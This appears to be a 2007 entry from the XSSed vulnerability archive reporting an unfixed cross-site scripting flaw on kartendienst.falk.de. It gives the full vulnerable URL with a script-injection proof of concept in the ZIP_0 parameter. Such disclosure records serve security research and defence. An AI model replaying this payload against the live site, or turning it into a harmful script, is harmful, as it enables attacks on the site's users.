Unfixed XSS vulnerability at kartendienst.falk.de

2007-07-08T00:00:00
ID XSSED:13404
Type xssed
Reporter Darkster
Modified 2007-07-08T00:00:00

Description

Security researcher Darkster, has submitted on 07/08/2007 a cross-site-scripting (XSS) vulnerability affecting kartendienst.falk.de, which at the time of submission ranked 17032 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 07/08/2007. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://kartendienst.falk.de/index.jsp?SET=locator&CID=61&LANG=DEU&STYLE=d_deichmann&todo=showLocationList&state=locationInput&LIST_COUNT=10&DEVICECHECK=0&SEARCH_0=DSD&SHOW_MAP=1&ID_0=0&GEOX_0=0&GEOY_0=0&STATUS_0=RED&CTRY_0=D&ZIP_0=%22%3E%3Cscript%3Ealert(1)%3C/script%3E&CITY_0=&CITY2_0=&STREET_0=&HOUSENO_0=&MAX_LOC=5&MAX_DIST=10&image.x=0&image.y=0&image=Anfrage%2bstarten